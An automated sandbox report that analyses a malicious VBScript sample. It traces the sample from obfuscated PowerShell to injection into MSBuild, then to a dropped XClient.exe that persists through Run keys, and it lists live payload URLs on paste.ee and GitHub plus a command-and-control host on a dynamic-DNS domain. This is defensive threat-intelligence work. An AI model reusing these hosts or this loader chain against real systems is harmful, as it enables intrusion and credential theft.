            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeQueries volume information: C:\Users\user\AppData\Local\XClient.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeQueries volume information: C:\Users\user\AppData\Local\XClient.exe VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build.Framework\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.Framework.dll VolumeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\XClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Build\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.Build.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: MSBuild.exe, 0000000C.00000002.2579886766.00000000011B0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.powershell.exe.1ffe69692d0.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.powershell.exe.1ffe69692d0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.2579124201.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1617406175.000001FFE6961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7600, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2396, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.powershell.exe.1ffe69692d0.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.powershell.exe.1ffe69692d0.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000C.00000002.2579124201.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1617406175.000001FFE6961000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7600, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 2396, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information221
            Scripting
            Valid Accounts11
            Windows Management Instrumentation
            221
            Scripting
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            OS Credential Dumping2
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Web Service
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution
            1
            DLL Side-Loading
            212
            Process Injection
            1
            Deobfuscate/Decode Files or Information
            LSASS Memory13
            System Information Discovery
            Remote Desktop ProtocolData from Removable Media1
            Ingress Tool Transfer
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts11
            Command and Scripting Interpreter
            1
            Scheduled Task/Job
            1
            Scheduled Task/Job
            2
            Obfuscated Files or Information
            Security Account Manager131
            Security Software Discovery
            SMB/Windows Admin SharesData from Network Shared Drive11
            Encrypted Channel
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts1
            Scheduled Task/Job
            21
            Registry Run Keys / Startup Folder
            21
            Registry Run Keys / Startup Folder
            1
            Software Packing
            NTDS2
            Process Discovery
            Distributed Component Object ModelInput Capture1
            Non-Standard Port
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud Accounts3
            PowerShell
            Network Logon ScriptNetwork Logon Script1
            DLL Side-Loading
            LSA Secrets141
            Virtualization/Sandbox Evasion
            SSHKeylogging2
            Non-Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Masquerading
            Cached Domain Credentials1
            Application Window Discovery
            VNCGUI Input Capture23
            Application Layer Protocol
            Data Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items141
            Virtualization/Sandbox Evasion
            DCSync1
            Remote System Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job212
            Process Injection
            Proc Filesystem1
            System Network Configuration Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1527696 Sample: k4STQvJ6rV.vbs Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 47 paste.ee 2->47 49 futurist2.ddns.net 2->49 51 raw.githubusercontent.com 2->51 71 Suricata IDS alerts for network traffic 2->71 73 Found malware configuration 2->73 75 Malicious sample detected (through community Yara rule) 2->75 81 11 other signatures 2->81 10 wscript.exe 1 2->10         started        13 XClient.exe 2 2->13         started        15 XClient.exe 1 2->15         started        signatures3 77 Connects to a pastebin service (likely for C&C) 47->77 79 Uses dynamic DNS services 49->79 process4 signatures5 85 VBScript performs obfuscated calls to suspicious functions 10->85 87 Suspicious powershell command line found 10->87 89 Wscript starts Powershell (via cmd or directly) 10->89 91 3 other signatures 10->91 17 cmd.exe 1 10->17         started        20 powershell.exe 7 10->20         started        22 conhost.exe 13->22         started        24 conhost.exe 15->24         started        process6 signatures7 61 Wscript starts Powershell (via cmd or directly) 17->61 63 Uses ping.exe to sleep 17->63 65 Uses ping.exe to check the status of other devices and networks 17->65 26 powershell.exe 7 17->26         started        29 PING.EXE 1 17->29         started        32 conhost.exe 17->32         started        67 Suspicious powershell command line found 20->67 69 Obfuscated command line found 20->69 34 powershell.exe 14 15 20->34         started        36 conhost.exe 20->36         started        process8 dnsIp9 93 Suspicious powershell command line found 26->93 95 Obfuscated command line found 26->95 97 Found suspicious powershell code related to unpacking or dynamic code loading 26->97 55 127.0.0.1 unknown unknown 29->55 57 paste.ee 188.114.97.3, 443, 49709 CLOUDFLARENETUS European Union 34->57 59 raw.githubusercontent.com 185.199.108.133, 443, 49708 FASTLYUS Netherlands 34->59 99 Writes to foreign memory regions 34->99 101 Injects a PE file into a foreign processes 34->101 38 MSBuild.exe 1 6 34->38         started        signatures10 process11 dnsIp12 53 futurist2.ddns.net 93.123.39.76, 20506, 49710, 49711 NET1-ASBG Bulgaria 38->53 45 C:\Users\user\AppData\Local\XClient.exe, PE32 38->45 dropped 83 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 38->83 43 WerFault.exe 21 38->43         started        file13 signatures14 process15

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            No Antivirus matches
            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Local\XClient.exe0%ReversingLabs
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            http://nuget.org/NuGet.exe0%URL Reputationsafe
            http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
            https://go.micro0%URL Reputationsafe
            https://contoso.com/License0%URL Reputationsafe
            https://contoso.com/Icon0%URL Reputationsafe
            https://aka.ms/pscore60%URL Reputationsafe
            https://contoso.com/0%URL Reputationsafe
            https://nuget.org/nuget.exe0%URL Reputationsafe
            https://oneget.orgX0%URL Reputationsafe
            https://aka.ms/pscore680%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            https://oneget.org0%URL Reputationsafe
            NameIPActiveMaliciousAntivirus DetectionReputation
            futurist2.ddns.net
            93.123.39.76
            truetrue
              unknown
              paste.ee
              188.114.97.3
              truetrue
                unknown
                raw.githubusercontent.com
                185.199.108.133
                truefalse
                  unknown
                  fp2e7a.wpc.phicdn.net
                  192.229.221.95
                  truefalse
                    unknown
                    NameMaliciousAntivirus DetectionReputation
                    https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtfalse
                      unknown
                      https://paste.ee/d/nyV34/0true
                        unknown
                        futurist2.ddns.nettrue
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          http://nuget.org/NuGet.exepowershell.exe, 00000009.00000002.1647885740.000001FFF6492000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE7EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                          • URL Reputation: safe
                          unknown
                          http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000009.00000002.1617406175.000001FFE7B63000.00000004.00000800.00020000.00000000.sdmpfalse
                            unknown
                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000009.00000002.1617406175.000001FFE7D6B000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            http://paste.eepowershell.exe, 00000009.00000002.1617406175.000001FFE684E000.00000004.00000800.00020000.00000000.sdmpfalse
                              unknown
                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000009.00000002.1617406175.000001FFE7D6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                unknown
                                https://go.micropowershell.exe, 00000009.00000002.1617406175.000001FFE7361000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://contoso.com/Licensepowershell.exe, 00000009.00000002.1617406175.000001FFE7EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                https://www.google.com;powershell.exe, 00000009.00000002.1617406175.000001FFE6809000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE693C000.00000004.00000800.00020000.00000000.sdmpfalse
                                  unknown
                                  https://contoso.com/Iconpowershell.exe, 00000009.00000002.1617406175.000001FFE7EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  unknown
                                  https://raw.githubusercontpowershell.exe, 00000009.00000002.1617406175.000001FFE7B14000.00000004.00000800.00020000.00000000.sdmpfalse
                                    unknown
                                    https://analytics.paste.eepowershell.exe, 00000009.00000002.1617406175.000001FFE6809000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE693C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      unknown
                                      https://paste.eepowershell.exe, 00000009.00000002.1617406175.000001FFE684E000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://aka.ms/pscore6powershell.exe, 00000005.00000002.1547296706.0000024B8001B000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://github.com/Pester/Pesterpowershell.exe, 00000009.00000002.1617406175.000001FFE7D6B000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://www.google.compowershell.exe, 00000009.00000002.1617406175.000001FFE6809000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE693C000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            https://raw.githubusercontent.compowershell.exe, 00000009.00000002.1617406175.000001FFE6643000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE7361000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtd0m;powershell.exe, 00000009.00000002.1617406175.000001FFE6643000.00000004.00000800.00020000.00000000.sdmpfalse
                                                unknown
                                                https://contoso.com/powershell.exe, 00000009.00000002.1617406175.000001FFE7EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://nuget.org/nuget.exepowershell.exe, 00000009.00000002.1647885740.000001FFF6492000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE7EE2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                http://raw.githubusercontent.compowershell.exe, 00000009.00000002.1617406175.000001FFE7B1A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://oneget.orgXpowershell.exe, 00000009.00000002.1617406175.000001FFE7B63000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://analytics.paste.ee;powershell.exe, 00000009.00000002.1617406175.000001FFE6809000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE693C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    unknown
                                                    https://cdnjs.cloudflare.compowershell.exe, 00000009.00000002.1617406175.000001FFE6809000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE693C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://aka.ms/pscore68powershell.exe, 00000005.00000002.1547296706.0000024B80069000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1690290292.0000024134B4D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1690290292.0000024134B3A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE6421000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://cdnjs.cloudflare.com;powershell.exe, 00000009.00000002.1617406175.000001FFE6809000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE693C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        unknown
                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000005.00000002.1547296706.0000024B8009C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1690290292.0000024134B13000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE6421000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.2589539147.0000000002EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://secure.gravatar.compowershell.exe, 00000009.00000002.1617406175.000001FFE6809000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE693C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          unknown
                                                          https://themes.googleusercontent.compowershell.exe, 00000009.00000002.1617406175.000001FFE6809000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1617406175.000001FFE693C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://oneget.orgpowershell.exe, 00000009.00000002.1617406175.000001FFE7B63000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs
                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            188.114.97.3
                                                            paste.eeEuropean Union
                                                            13335CLOUDFLARENETUStrue
                                                            185.199.108.133
                                                            raw.githubusercontent.comNetherlands
                                                            54113FASTLYUSfalse
                                                            93.123.39.76
                                                            futurist2.ddns.netBulgaria
                                                            43561NET1-ASBGtrue
                                                            IP
                                                            127.0.0.1
                                                            Joe Sandbox version:41.0.0 Charoite
                                                            Analysis ID:1527696
                                                            Start date and time:2024-10-07 08:55:08 +02:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 7m 12s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Number of analysed new started processes analysed:24
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:k4STQvJ6rV.vbs
                                                            renamed because original name is a hash value
                                                            Original Sample Name:e1cadf5476665ac4d120fea85cb6da31.vbs
                                                            Detection:MAL
                                                            Classification:mal100.troj.expl.evad.winVBS@20/17@4/4
                                                            EGA Information:
                                                            • Successful, ratio: 33.3%
                                                            HCA Information:
                                                            • Successful, ratio: 100%
                                                            • Number of executed functions: 86
                                                            • Number of non-executed functions: 0
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .vbs
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 20.109.210.53, 192.229.221.95, 52.165.164.15, 13.85.23.206, 40.126.32.133, 40.126.32.68, 40.126.32.140, 20.190.160.14, 20.190.160.20, 40.126.32.76, 40.126.32.136, 40.126.32.72, 20.189.173.22
                                                            • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, slscr.update.microsoft.com, www.tm.v4.a.prd.aadg.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, umwatson.events.data.microsoft.com, glb.sls.prod.dcat.dsp.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                            • Execution Graph export aborted for target XClient.exe, PID 2548 because it is empty
                                                            • Execution Graph export aborted for target XClient.exe, PID 5408 because it is empty
                                                            • Execution Graph export aborted for target powershell.exe, PID 7208 because it is empty
                                                            • Execution Graph export aborted for target powershell.exe, PID 8096 because it is empty
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                            • Report size getting too big, too many NtSetInformationFile calls found.
                                                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                            TimeTypeDescription
                                                            02:56:18API Interceptor39x Sleep call for process: powershell.exe modified
                                                            02:56:28API Interceptor1088845x Sleep call for process: MSBuild.exe modified
                                                            02:57:59API Interceptor1x Sleep call for process: WerFault.exe modified
                                                            08:56:32AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run XClient C:\Users\user\AppData\Local\XClient.exe
                                                            08:56:40AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run XClient C:\Users\user\AppData\Local\XClient.exe
                                                            08:56:48AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            188.114.97.3http://www.thegulfthermale.com.tr/antai/12/3dsec.phpGet hashmaliciousUnknownBrowse
                                                            • www.thegulfthermale.com.tr/antai/12/3dsec.php
                                                            QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                            • filetransfer.io/data-package/eZFzMENr/download
                                                            QUOTATION_OCTQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • filetransfer.io/data-package/MlZtCPkK/download
                                                            https://technopro-bg.com/redirect.php?action=url&goto=mairie-espondeilhan.com&osCsid=m24rb0l158b8m36rktotvg5ti2Get hashmaliciousHTMLPhisherBrowse
                                                            • mairie-espondeilhan.com/
                                                            QUOTATION_SEPQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                            • filetransfer.io/data-package/758bYd86/download
                                                            QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                            • filetransfer.io/data-package/58PSl7si/download
                                                            QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                            • filetransfer.io/data-package/58PSl7si/download
                                                            payment copy.exeGet hashmaliciousFormBookBrowse
                                                            • www.cc101.pro/0r21/
                                                            BX7yRz7XqF.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                            • cloud.dellicon.top/1000/500/
                                                            jKSjtQ8W7O.lnkGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                            • ministryofficedownloadcloudserver.screenpont.xyz/78/CKP/
                                                            185.199.108.133Request For Quotation.jsGet hashmaliciousAgentTeslaBrowse
                                                              PO.78NO9.xlsGet hashmaliciousFormBookBrowse
                                                                Company Profile.vbsGet hashmaliciousUnknownBrowse
                                                                  http://barik-ankita.github.io/Netflix-cloneGet hashmaliciousHTMLPhisherBrowse
                                                                    http://mr-zkpak47.github.io/Netflix_Front_PageGet hashmaliciousHTMLPhisherBrowse
                                                                      na.rtfGet hashmaliciousRemcosBrowse
                                                                        http://kartike1103.github.io/NetflixGet hashmaliciousHTMLPhisherBrowse
                                                                          http://sachinchaunal.github.io/Netflix-Clone-Old-VersionGet hashmaliciousHTMLPhisherBrowse
                                                                            https://uni.olga.finance/Get hashmaliciousUnknownBrowse
                                                                              https://swiftclaimairdropmeta.pages.dev/Get hashmaliciousHTMLPhisherBrowse
                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                futurist2.ddns.netFOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exeGet hashmaliciousXWormBrowse
                                                                                • 102.90.42.110
                                                                                file.exeGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                • 194.147.140.135
                                                                                AB8A3B1F7F616EF9E6F6F5AFF32AA27F746A4AFE9F734.exeGet hashmaliciousNanocoreBrowse
                                                                                • 194.5.98.23
                                                                                paste.eeQuotation request YN2024-10-07pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                • 188.114.96.3
                                                                                Urgent Purchase Order (P.O.) No.477764107102024.vbsGet hashmaliciousRemcosBrowse
                                                                                • 188.114.96.3
                                                                                SWIFT 103 202406111301435660 110624-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                • 188.114.97.3
                                                                                FAKTURA-pdf-466366332.vbsGet hashmaliciousUnknownBrowse
                                                                                • 188.114.96.3
                                                                                PDFDQ_P01_303B9367_2024-10-03_185650.vbsGet hashmaliciousRemcosBrowse
                                                                                • 188.114.96.3
                                                                                SKMBT_77122012816310TD0128_17311_XLS.vbsGet hashmaliciousRemcosBrowse
                                                                                • 188.114.97.3
                                                                                Purchase Order - PO14895.vbsGet hashmaliciousRemcosBrowse
                                                                                • 188.114.96.3
                                                                                sostener.vbsGet hashmaliciousNjratBrowse
                                                                                • 188.114.97.3
                                                                                sostener.vbsGet hashmaliciousXWormBrowse
                                                                                • 188.114.96.3
                                                                                NhtSITq9Zp.vbsGet hashmaliciousRemcosBrowse
                                                                                • 188.114.96.3
                                                                                raw.githubusercontent.comRequest For Quotation.jsGet hashmaliciousAgentTeslaBrowse
                                                                                • 185.199.108.133
